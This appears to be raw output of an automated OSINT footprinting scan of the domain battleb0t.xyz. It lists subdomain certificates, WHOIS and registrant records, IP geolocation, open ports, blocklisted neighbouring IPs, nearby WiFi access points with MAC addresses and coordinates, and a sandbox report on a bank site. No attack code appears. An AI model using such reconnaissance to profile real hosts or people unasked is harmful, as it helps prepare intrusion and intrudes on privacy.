| 2023-05-12 02:44:19 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'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', 
u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/jcqn.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:02 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Google LLC', u'organization_name': u'Google LLC', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:01'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'35.229.48.116', u'continent': u'North America', u'region_iso_code': u'SC'} | 35.229.48.116 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.106): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | public (Category: finance)
https://public.com/@login | login |
| 2023-05-12 03:32:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.11:443 | 188.114.97.0/24 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2095 | 188.114.97.1 |
| 2023-05-12 02:44:05 | Raw Data from RIRs | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | [{"url": "https://ayhu.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://ayhu.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | ayhu.xyz |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 0d70cf (Net ID: 00:02:2D:0D:70:CF) | 37.7642, -122.3993 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.73): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SMG (Net ID: 00:0C:41:BD:EA:B0) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:28:68:59:E3) | 32.8608, -79.9746 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | linksys (Net ID: 00:18:39:2C:B7:B2) | 40.2024, 29.0398 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-nf-request-id": "01H06Y2YH7X6V06YSWWEW2NH9C", "content-type": "text/css; charset=UTF-8", "age": "0"} | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 02:45:44 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.109.153 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.150): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:25 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | CN=funny.battleb0t.xyz |
| 2023-05-12 02:56:53 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 14, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bancociudad.com.ar/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"8.243.10.90:443"\n "104.18.32.68:80"\n "104.17.25.14:443"\n "142.250.188.234:443"\n "142.250.72.227:443"\n "142.250.72.168:443"\n "142.250.72.131:443"\n "23.111.9.57:443"\n "172.64.133.15:443"\n "142.250.68.14:443"\n "142.250.189.6:443"\n "142.250.72.226:443"\n "142.250.189.14:443"\n "142.250.217.130:443"\n "157.240.254.7:443"\n "146.75.92.157:443"\n "13.227.44.24:443"\n "172.67.69.156:443"\n "35.186.248.98:443"\n "216.239.34.181:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bancociudad.com.ar"\n "browser-update.org"\n "cdn-widgets.chattigo.com"\n "cdnjs.cloudflare.com"\n "config-global.chattigo.com"\n "ocsp.sectigo.com"\n "static.ads-twitter.com"\n "twemoji.maxcdn.com"\n "use.fontawesome.com"\n "www.bancociudad.com.ar"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, 
u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3348:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:6324:304:WilStaging_02"\n "Local\\SM0:6324:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:3348:120:WilError_01"\n "Local\\SM0:3348:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3348:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2940:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.sectigo.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"29c3c455eb0ebe5b_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\29c3c455eb0ebe5b_0]- [targetUID: 00000000-00003348]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003348]\n "f_00024d" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00004292]\n "f_000268" has type "JPEG image data baseline precision 8 960x420 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000268]- [targetUID: 00000000-00004292]\n "dc024e37-24d7-4619-b791-203aee584692.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) 
original size modulo 2^32 53900"- Location: [%TEMP%\\dc024e37-24d7-4619-b791-203aee584692.tmp]- [targetUID: 00000000-00003348]\n "Tabs_13313178968803289" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13313178968803289]- [targetUID: 00000000-00003348]\n "765cfe4494a18824_0" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003348]\n "e3c33c80-9437-442d-879c-95d0314ecde7.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e3c33c80-9437-442d-879c-95d0314ecde7.tmp]- [targetUID: 00000000-00003348]\n "f_00023e" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00004292]\n "2ad8c636674bcc14_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\2ad8c636674bcc14_0]- [targetUID: 00000000-00003348]\n "f_000284" has type "Ogg data Vorbis audio stereo 44100 Hz ~96000 bps"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000284]- [targetUID: 00000000-00004292]\n "4e8147e4f545a47c_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4e8147e4f545a47c_0]- [targetUID: 00000000-00003348]\n "91369cf243ec2070_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "TrueType Font data 11 tables 1st "OS/2" 14 names Macintosh type 1 string icomoon "- [targetUID: N/A]\n "2d8883836df10fc0_0" has type "data"- [targetUID: N/A]\n "f_00023d" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00004292]\n 
"f1de57bd-9604-4dcb-9e44-716a69cec2a9.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\f1de57bd-9604-4dcb-9e44-716a69cec2a9.tmp]- [targetUID: 00000000-00004292]\n "4af3c85af602fe93_0" has type "data"- [targetUID: N/A]\n "c1970b30fb6d8527_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\c1970b30fb6d8527_0]- [targetUID: 00000000-00003348]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"static.ads-twitter.com" (Indicator: "twitter")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.bancociudad.com.ar/"\n Pattern match: "https://www.bancociudad.com.ar"\n Heuristic match: "ocsp.sectigo.com"\n Heuristic match: "GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBS83pEmglYTXfyF78OS%2BRiTRWadkgQULGn%2FgMmHkK404bTnTJOFmUDpp7ICEQC2rT5BoDb95aPVWokq%2BuwL HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/10.0\nHost: ocsp.sectigo.com"\n Heuristic match: "bancociudad.com.ar"\n Heuristic match: "browser-update.org"\n Heuristic match: "cdn-widgets.chattigo.com"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "config-global.chattigo.com"\n Heuristic match: "static.ads-twitter.com"\n Heuristic match: "twemoji.maxcdn.com"\n Heuristic match: "use.fontawesome.com"\n Pattern match: "www.bancociudad.com.ar"\n Pattern match: 
".bancociudad.com.ar/\'i1s;itu;\';__\'il/"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random\n "twemoji.maxcdn.com" seems to be random'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/92 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-0000044C-1273661857\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE4-7938540729\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE4-8638274333\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE6-25412996207\n 
"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d29bc76d-2b8d-4a95-80d7-f22f79c87d73" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE4-25414099115\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE2-426277081165 | 35.229.48.116 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | attwifi (Net ID: 00:14:6A:5B:53:92) | 32.8608, -79.9746 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.17): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet1383 (Net ID: 00:08:52:1E:13:81) | 39.0469, -77.4903 |
| 2023-05-12 03:04:07 | Malicious IP on Same Subnet | Yes | Greensnow | 0 | 0 | 4 | 0 | None | greensnow.co [46.101.128.0/17]
https://blocklist.greensnow.co/greensnow.txt | 46.101.128.0/17 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 1 | 0 | 2 | 0 | None | (c) CentralNic Ltd | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
